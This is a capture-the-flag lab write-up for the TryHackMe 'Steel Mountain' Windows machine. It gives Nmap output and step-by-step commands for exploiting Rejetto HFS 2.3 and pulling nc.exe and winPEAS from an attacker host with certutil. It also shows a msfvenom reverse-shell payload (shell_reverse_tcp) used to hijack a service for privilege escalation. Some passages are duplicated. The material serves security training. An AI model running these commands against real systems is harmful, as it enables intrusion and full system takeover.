10 KiB
#TryHackMe-Steel Mountain
NMAP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93]
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Nmap scan report for 10.10.252.157
Host is up (0.18s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-26T18:26:30
|_ start_date: 2020-10-26T18:21:06
PORT 80
Who is the employee of the month?
Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question.
Scan the machine with nmap. What is the other port running a web server on?
PORT 8080
PORT 8080
Clicking below at the link HttpFileServer 2.3 will redirect you to a page
Take a look at the other web server. What file server is running?
Rejetto Http File Server
What is the CVE number to exploit this file server?
Searchsploit
Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it
Let's try using this exploit
https://www.exploit-db.com/exploits/39161
Change the local IP and local port if you want doesn't matter if you use the default 443 port in this exploit
Now host the nc.exe on you local machine which can be downloaded from github https://github.com/int0x33/nc.exe/blob/master/nc.exe or if your using kali linux then it will be available to /usr/share/windows-resources/binaries/nc.exe
Hosting this file can be through python but remember to keep the port on 80 because that's the default port that http listens on
python3 -m http.server 80
Also set up a net cat listener nc -lvp [port]
Run the exploit with python2 39161 8080
Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute nc.exe
Now upload winPEAS.exe on the machine for that host that file locally then download it on targeted machine
C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\bill\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\bill\Desktop
10/26/2020 02:31 PM <DIR> .
10/26/2020 02:31 PM <DIR> ..
10/26/2020 01:57 PM 600,580 PowerUp.ps1
09/27/2019 05:42 AM 70 user.txt
10/26/2020 02:31 PM 472,064 winpeas.exe
3 File(s) 1,072,714 bytes
2 Dir(s) 44,155,019,264 bytes free
C:\Users\bill\Desktop>
Now by simply typing .\winpeas.exe
We can see that this services can be exploited so let's generate a payload named as ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again
Stoppping the service
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Starting the service
Metasploit
No we want to escalate our root privileges so we will run Powerup.ps1 powershell script to look for misconfigurations on targeted windows machine
To enter into powershell first write load powershell then powershell_shell
Run . .\PowerUp.ps1 and Invoke-AllChecks
Now check for service having canRestart set to True
And name of the service is AdvancedSystemCareService9
Now generate a payload with name ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again
Stoppping the service
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Starting the service